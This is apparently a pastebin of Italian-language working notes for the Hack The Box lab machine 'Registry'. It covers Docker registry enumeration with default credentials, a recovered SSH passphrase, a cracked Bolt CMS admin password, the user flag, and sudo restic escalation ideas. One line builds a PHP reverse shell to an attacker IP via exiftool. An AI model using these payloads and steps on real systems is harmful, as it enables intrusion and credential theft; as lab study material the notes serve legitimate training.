· 6 years ago · Nov 07, 2019, 08:36 AM
1 nmap -A 10.10.10.159
2Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 10:09 CET
3Nmap scan report for 10.10.10.159
4Host is up (0.18s latency).
5Not shown: 997 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
10| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
11|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
1280/tcp open http nginx 1.14.0 (Ubuntu)
13|_http-server-header: nginx/1.14.0 (Ubuntu)
14|_http-title: Welcome to nginx!
15443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
16|_http-server-header: nginx/1.14.0 (Ubuntu)
17|_http-title: Welcome to nginx!
18| ssl-cert: Subject: commonName=docker.registry.htb
19| Not valid before: 2019-05-06T21:14:35
20|_Not valid after: 2029-05-03T21:14:35
21No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
22
23
24echo 10.10.10.159 docker.registry.htb >> /etc/hosts
25echo 10.10.10.159 registry.htb >> /etc/hosts
26
27
28--------------------------------------------------------------------------
29
30
31GENERATED WORDS: 4612
32
33---- Scanning URL: http://docker.registry.htb/ ----
34+ http://docker.registry.htb/v2 (CODE:301|SIZE:39)
35
36
37dirb https://docker.registry.htb
38
39
40
41-----------------
42
43GENERATED WORDS: 4612
44
45---- Scanning URL: https://docker.registry.htb/ ----
46+ https://docker.registry.htb/v2 (CODE:301|SIZE:39)
47
48
49--------------------------------------------------------------------------
50
51
52https://docker.registry.htb/v2/ admin admin
53
54
55
56/install
57/install/index.php <-------------------- gzip con CA
58
59/backup.php
60
61
62
63
64
65
66SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuMTQuMCAoVWJ1bnR1KQ0KRGF0ZTogTW9uLCAwNCBOb3YgMjAxOSAxMzozMDo1MSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBjbG9zZQ0KU3RyaWN0LVRyYW5zcG9ydC1TZWN1cml0eTogbWF4LWFnZT02MzA3MjAwMDsgaW5jbHVkZVN1YmRvbWFpbnMNClgtRnJhbWUtT3B0aW9uczogREVOWQ0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KQ29udGVudC1MZW5ndGg6IDEwNTANCg0KH4sIAGyDP10AA+3VSa+rNhQA4LvmV0TqMnqXIQSS7mwwYYgJBDLuSJgJhIATCL++N/dVlfo6SVVfq0r+NpbOOcKWbM45B+/nhrx9V9wHWZ5+rpzI/3rlOIHnpDd+IkoiL0wkTn7jeEHgp28j7vse66t7S4JmNHrruu5LGJDgj+r+Kv8/9eUFooVhjxS09g3NUICPPqMMNgyFVRUFRF4COgOCxDCBoRGt1LZ+hwgG3ELxbgvPOE1UF0Gl2wAMcY984MDE3jIQYKxo5uUoXIZQN6cYinvVR1Osbjo7N3rsu4O9vX7EjM8YHn6JdWhAawaD2QLwGwS6ztiU2yrY29y5KrokQdm3uwN3A4BoQLUDr7wFrgZkgKt0c1jabQ3D+HkWMRmTaBODbRrVeR5xrIm48DQ3bmXBqx+RXdwA5V7y1+oRnAx2yvjT5rlPdqd54c0UKRnaixY7aSMTv6yV7BIsHWAOuq+m1lh3FXwFqTpY+6xAQujVrTllhqMVmKeSeFI8uS3z3Bywc3vikLCZWFRCU3NHJxxPZ7VRzNAwU2Y15MlKzidjF0Tz7sw00qPnncOjWx12cpTIPordsnQJe220Vr5K9yOPm+qErNNRGp9aZ79UiSihh15CNdxUPDMs/MGYHIQNrlfyeo9sTmoloov3uA76S10nq2otpN6j8/bN7rlNBXW74I/H+/iyJGKkG8xNMx9mMy3YPuTsMRw/BL1RVmkMEgwBWOSbAa4x5F43FaqJu4PQr61o7aHh4Rf33Z6ZsV01HyaqcwDufADx63HoHkYLFeySb4q/qf36kPSP74N4hqAPVODq7O+9vNfdAxfAZWLPe8618ThNTEN/+MieMEtwTUW1FPbT2yFijxVRrN24rmGzX5bFquSlIjd7qcPGY2OvrFsn6NNtq9d+Dr1jXCGT2ZR3R9+lD0Ub0sXRzC00BhW/Fa8gg5EboQKJxqyyzDa2TC7TVkN+XJ0gOQj9osCDZDOyuY1QPX+E5T2XWQcXZ6JKQtkXGHTVMjOjnJwCYTzvNQuvIjZo1yCP3WjptEsbh03DKJvez/YIKb3mLKrToIcnogf6TckaBOWOjI9pOukO2vZszyYnuZLzwXpORNUu3NDoyZxxsZPfeG/q3fbmbbjW4qoiabK7fPwtXsRKw+zo39U8tI2654gmy0GTCs1mZewtI2r6KWQ+uwKy1d92iv+6i1F/VxMFYRm9l+F33OMv5j8ncPxr/suCIHGixL3mvyTJdP7/G34YOU32CEg0Uq/nImpG6yjJWtI8GebLKCWkbn9k2fB6bt/Dz/z7+Vqyzc81bBjVl+szqxL2T6qjKsmqiG2j873JyJM9Rw3J4uz8sWnL0tZBURRFURRFURRFURRFURRFURRFURT1z/gJNZErZAAoAAAK
67
68
69ca.crt0000775000004100000410000000210613464123607012215 0ustar www-datawww-data
70
71-----BEGIN CERTIFICATE-----
72MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
73BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
74MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
75AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
76T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
77zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
78r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
79zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
80qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
818/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
82HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
83LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
84UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
857JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
86CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
87QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
88-----END CERTIFICATE-----
89
90readme.md0000775000004100000410000000020113472260460012667 0ustar www-datawww-data# Private Docker Registry
91
92- https://docs.docker.com/registry/deploying/
93- https://docs.docker.com/engine/security/certificates/
94
95
96
97/v2/image /manifest
98
99
100scaricare i docker e trovare utente bolt e certificato root
101
102password nei file sh del certificato.
103
104usare il certificato
105
106
107
108
109
110
111
112
113
114dirbuster http://docker.registry.htb
115
116The methodology for getting the catalog size is:
117
118 GET /v2/_catalog?n=300 (more than our repo count)
119 for each repository returned, GET /v2/[repository_path]/tags/list
120 for each tag listed, GET /v2/[repository_path]/manifests/[tag]
121 from the manifest returned, HEAD /v2/[repository_path]/blobs/[blob_checksum]
122 store the content-length header
123
124
125v2/_catalog
126{"repositories":["bolt-image"]}
127
128
129
130ytc0ytdmnzywnzgxngi0zte0otm3ywzi
131
132
133
134
135
136
137
138
139
140
141
142
143https://github.com/docker/distribution/issues/2212
144
145
146
147
148enumerazione docker ---> manifest----> puntamenti a file ocmpressi
149
150garbage registry docker. utente bolt registry.htb/bolt e github cms
151
152
153::::::::::::::::::::::::::::
154
155
156http://docker.registry.htb/v2/ admin admin
157
158http://docker.registry.htb/v2/_catalog?n=300
159{"repositories":["bolt-image"]}
160
161
162http://docker.registry.htb/v2/bolt-image/tags/list
163{"name":"bolt-image","tags":["latest"]}
164
165
166http://docker.registry.htb/v2/bolt-image/manifests/latest
167
168
169
170
171
172{
173 "schemaVersion": 1,
174 "name": "bolt-image",
175 "tag": "latest",
176 "architecture": "amd64",
177 "fsLayers": [
178 {
179 "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
180 },
181 {
182 "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
183 },
184 {
185 "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
186 },
187 {
188 "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
189 },
190 {
191 "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
192 },
193 {
194 "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
195 },
196 {
197 "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
198 },
199 {
200 "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
201 },
202 {
203 "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
204 },
205 {
206 "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
207 }
208 ],
209 "history": [
210 {
211 "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
212 },
213 {
214 "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
215 },
216 {
217 "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
218 },
219 {
220 "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
221 },
222 {
223 "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
224 },
225 {
226 "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}"
227 },
228 {
229 "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}"
230 },
231 {
232 "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}"
233 },
234 {
235 "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
236 },
237 {
238 "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
239 }
240 ],
241 "signatures": [
242 {
243 "header": {
244 "jwk": {
245 "crv": "P-256",
246 "kid": "BE5C:NOJP:EOC2:ERND:F2LL:EUKC:5KAA:FAKD:4WV3:SF5Z:T3BE:KD5F",
247 "kty": "EC",
248 "x": "AzGEIs7i0H7UBjuBNzAK81A6-fmLG1Pt2WLvxUsTBGI",
249 "y": "rHfxYV5s6hLG5C6UYcSw6qW0Vd4ZvlI3JyGcBvFLJyI"
250 },
251 "alg": "ES256"
252 },
253 "signature": "Qm65jE1RNqpkHcj0_-MqJ8DnW11rZGR9jEbsDQFe4wWs4I8LuYEWyV6ktxpTy_0T-VQSMRLxSXpvxil0pi4H4Q",
254 "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxOS0xMS0wNVQwODoyNDoyMVoifQ"
255 }
256 ]
257}
258
259
260
261
262registry.htb/backup.php esegue un php shell execute che esegue il backup <--------------
263
264
265
266http://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
267
268e così tutti gli altri fino a sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff
269
270
271decomprimiamo e cerchiamo informazioni dentro i container
272
273
274::::::::::::::
275INFO UTILI
276::::::::::::::
277
278
279bolt@bolt:/var/www/html$ netstat -an
280Active Internet connections (servers and established)
281Proto Recv-Q Send-Q Local Address Foreign Address State
282tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
283tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
284tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
285tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
286tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
287tcp 0 316 10.10.10.159:22 10.10.14.34:53700 ESTABLISHED
288tcp6 0 0 :::80 :::* LISTEN
289tcp6 0 0 :::22 :::* LISTEN
290udp 0 0 127.0.0.53:53 0.0.0.0:*
291
292
293
294
295/var/www/html/sync.sh da vi????? non suid
296/etc/profile.d/01-ssh.sh
297
298
299#!/usr/bin/expect -f
300#eval `ssh-agent -s`
301spawn ssh-add /root/.ssh/id_rsa
302expect "Enter passphrase for /root/.ssh/id_rsa:"
303send "GkOcz221Ftb3ugog\n"; <--------- chiave di un certificato????
304expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
305interact
306
307
308git clone https://github.com/bolt/bolt.git <-----git hub????
309
310ssh-keygen -t rsa -b 4096 -C "bolt@registry.htb"
311
312
313
314
315www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
316backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
317list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
318irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
319gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
320nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
321_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
322
323c'è anche user bolt in altri garbage
324
325
326#!/bin/bash
327rsync -azP registry:/var/www/html/bolt . sync.sh in /var/www/html
328
329
330.vminfo di /root ha molte informazioni su comandi lanciati in vim. ma vim no suid
331
332
333Trovate le chiavi in /root/.ssh in pratica il root del container è lo user bolt
334
335Host registry
336 User bolt
337 Port 22
338 Hostname registry.htb
339
340passphrase GkOcz221Ftb3ugog
341
342
343System load: 0.0 Users logged in: 0
344 Usage of /: 5.5% of 61.80GB IP address for eth0: 10.10.10.159
345 Memory usage: 23% IP address for br-1bad9bd75d17: 172.18.0.1
346 Swap usage: 0% IP address for docker0: 172.17.0.1
347
348
349ok dentro.....Prendiamo user
350
351bolt@bolt:~$ cat user.txt
352ytc0ytdmnzywnzgxngi0zte0otm3ywzi
353bolt@bolt:~$
354
355
356
357bolt@bolt:/var/www/html$ cat backup.php
358<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
359
360lo possiamo intendere come un sudo -l... ma come utente????non è ALL
361
362sudo restic backup -r rest:http://backup.registry.htb/bolt bolt
363
364
365
366
367https://github.com/restic/restic
368
369il backup fa il download in quanto usa api restfull. i file sotto la fold destinataria vengono scritti come www-data.
370aggiungere un file in
371http://backup.registry.htb/bolt da far scrivere in bolt????
372
373
374
375
376
377
378bolt@bolt:/var/www/html/bolt$ ls
379app codeception.yml composer.lock extensions index.php phpunit.xml.dist src theme
380changelog.md composer.json CONTRIBUTING.md files LICENSE.md README.md tests vendor
381
382sottosito in
383
384
385http://registry.htb/bolt/ <-------------
386
387
388find ./ -name *.db
389./vendor/codeception/codeception/tests/data/sqlite.db
390./tests/phpunit/unit/resources/db/bolt.db
391./app/database/bolt.db
392
393
394find ./ -name login*
395./vendor/codeception/codeception/tests/data/app/view/login.php
396./app/view/twig/login
397./app/view/twig/login/login.twig
398
399
400
401scp -i id_rsa bolt@registry.htb:/var/www/html/bolt/app/database/bolt.db ./database.db
402
403usiamo sqlitebrowser. dati importanti
404
405troviamo admin
406$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
407["files://shell.php"]
408
409
410Cost 1 (iteration count) is 1024 for all loaded hashes
411Press 'q' or Ctrl-C to abort, almost any other key for status
412
413strawberry (?) <-----------
414
4151g 0:00:00:12 DONE (2019-11-05 10:33) 0.08143g/s 26.62p/s 26.62c/s 26.62C/s strawberry..dennis
416Use the "--show" option to display all of the cracked passwords reliably
417Session completed
418
419
420
421per scrivere in bolt e aggiungere un file da eseguire al sito es. shell.php bisogna essere www-data l'unico che
422può scrivere in html/bolt
423
424movimento laterale. invece root esegue backup.php <------
425
426
427
428
429creare un file su web bolt ed eseguire backup come www-data che èuò leggere hystory ed eseguire sudo restic (shell root)
430
431
432
433
434
435
436cd bolt
437
438
439
440
441lxd:x:105:65534::/var/lib/lxd/:/bin/false
442uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
443dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
444landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
445pollinate:x:109:1::/var/cache/pollinate:/bin/false
446statd:x:110:65534::/var/lib/nfs:/usr/sbin/nologin
447sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
448bolt:x:1001:1001::/home/bolt:/bin/bash
449vboxadd:x:999:1::/var/run/vboxadd:/bin/false
450git:x:1000:33::/var/www/html:/bin/bash
451
452
453bolt ---> git ----->www-data (.bashhitory)????----> root
454
455
456
457abbiamo admin strawberry. creare pagina su /bolt e eseguire backup come www-data <-----------------
458
459
460
461http://backup.registry.htb/bolt/bolt/login <-----github
462
463accesso admin strawberry
464
465
466
467http://backup.registry.htb/bolt/bolt/files <----- come nel db stack
468
469files://
470
471themes://base-2018
472
473
474uploado un file sotto theme e richiamo il backup.php che mi salva come www-data <----------------------
475
476
477
478
479
480
481autorizzo il file con estesione php [NON SI RIESCE A SALVARE IL FILE YAML]
482
483http://backup.registry.htb/bolt/bolt/file/edit/config/config.yml
484
485# never allowed: sh, asp, cgi, php, php3, ph3, php4, ph4, php5, ph5, phtm, phtml
486accept_file_types: [ php, twig, html, js, css, scss, gif, jpg, jpeg, png, ico, zip, tgz, txt, md, doc, docx, pdf, epub, xls, xlsx, ppt, pptx, mp3, ogg, wav, m4a, mp4, m4v, ogv, wmv, avi, webm, svg]
487
488
489
490e se invece la carte
491
492
493
494
495
496
497ls -lisa /var/backups
498total 111292
4992883586 4 drwxr-xr-x 2 root root 4096 May 29 11:05 .
5002883585 4 drwxr-xr-x 14 root root 4096 May 19 22:19 ..
5012886019 111284 -rw-r--r-- 1 root root 113953155 May 29 11:04 bolt.tgz <----?????
502
503
504
505
506
5072891781 0 -rw------- 1 git www-data 0 Oct 8 21:54 .bash_history
508
509
510
511
512olt@bolt:/var/www/html/install$ ls
513index.php
514bolt@bolt:/var/www/html/install$ cat index.php <---dati binari ca.crt
515
516
517
518---------------------------------------
519
520
521exiftool -Comment='<?php echo system('/bin/sh -i >& /dev/tcp/10.10.14.34/8000 0>&1'); ?>' ./Desktop/1.png
522
523
524CMS Bolt - Arbitrary File Upload (Metasploit) | exploits/php/remote/38196.rb
525
526sito reale http://registry.htb/bolt/bolt/login
527
528
529
530modificare il file config.yml da registry.htb e immediatamanete prima di un backup caricare il file php che ci funziona come
531www-data.
532
533sudo -l www-data esegue il backup. quando parte il backup il sito viene sovrascritto
534
535
536http://registry.htb/bolt/bolt/file/edit/config/config.yml
537http://registry.htb/bolt/bolt/files
538http://registry.htb/bolt/files/mytest.php?a846763cc3
539
540
541
542
543
544Matching Defaults entries for www-data on bolt:
545env_reset, exempt_group=sudo, mail_badpass,
546secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
547User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest*
548
549
550<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
551
552
553di default senza echo php non abbiamo stdout. eseguire shell php con >
554
555
556
557
558
559<?php
560echo "Avvio shell...<br>";
561echo system("sudo restic backup -r rest --help");
562
563
564Avvio shell...
565The "backup" command creates a new snapshot and saves the files and directories given as the arguments. Usage: restic backup [flags] FILE/DIR [FILE/DIR] ... Flags: -e, --exclude pattern exclude a pattern (can be specified multiple times) --exclude-caches excludes cache directories that are marked with a CACHEDIR.TAG file --exclude-file file read exclude patterns from a file (can be specified multiple times) --exclude-if-present stringArray takes filename[:header], exclude contents of directories containing filename (except filename itself) if header of that file is as provided (can be specified multiple times) --files-from string read the files to backup from file (can be combined with file args) -f, --force force re-reading the target files/directories (overrides the "parent" flag) -h, --help help for backup --hostname hostname set the hostname for the snapshot manually. To prevent an expensive rescan use the "parent" flag -x, --one-file-system exclude other file systems --parent string use this parent snapshot (default: last snapshot in the repo that has the same target files/directories) --stdin read backup from stdin --stdin-filename string file name to use when reading from stdin (default "stdin") --tag tag add a tag for the new snapshot (can be specified multiple times) --time string time of the backup (ex. '2012-11-01 22:08:41') (default: now) --with-atime store the atime for all files and directories Global Flags: --cacert stringSlice path to load root certificates from (default: use system certificates) --cache-dir string set the cache directory --cleanup-cache auto remove old cache directories --json set output mode to JSON for commands that support it --limit-download int limits downloads to a maximum rate in KiB/s. (default: unlimited) --limit-upload int limits uploads to a maximum rate in KiB/s. (default: unlimited) --no-cache do not use a local cache --no-lock do not lock the repo, this allows some operations on read-only repos -o, --option key=value set extended option (key=value, can be specified multiple times) -p, --password-file string read the repository password from a file (default: $RESTIC_PASSWORD_FILE) -q, --quiet do not output comprehensive progress report -r, --repo string repository to backup to or restore from (default: $RESTIC_REPOSITORY) --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key
566
567:::::::::::::::::::::::::::::::::::::::::::::::::::::::
568
569preparare sotto /temp con bolt un rest server
570https://github.com/restic/rest-server/blob/master/cmd/rest-server/main.go ?????
571in questo modo dovrebbe essere soddisfatta anche la regola del backup.registry.htb
572
573
574oppure
575
576https://computingforgeeks.com/best-secure-backup-program/
577
578
579$ sudo restic autocomplete
580
581Usage:
582 restic autocomplete [flags]
583
584Flags:
585 --completionfile string autocompletion file (default "/etc/bash_completion.d/restic.sh")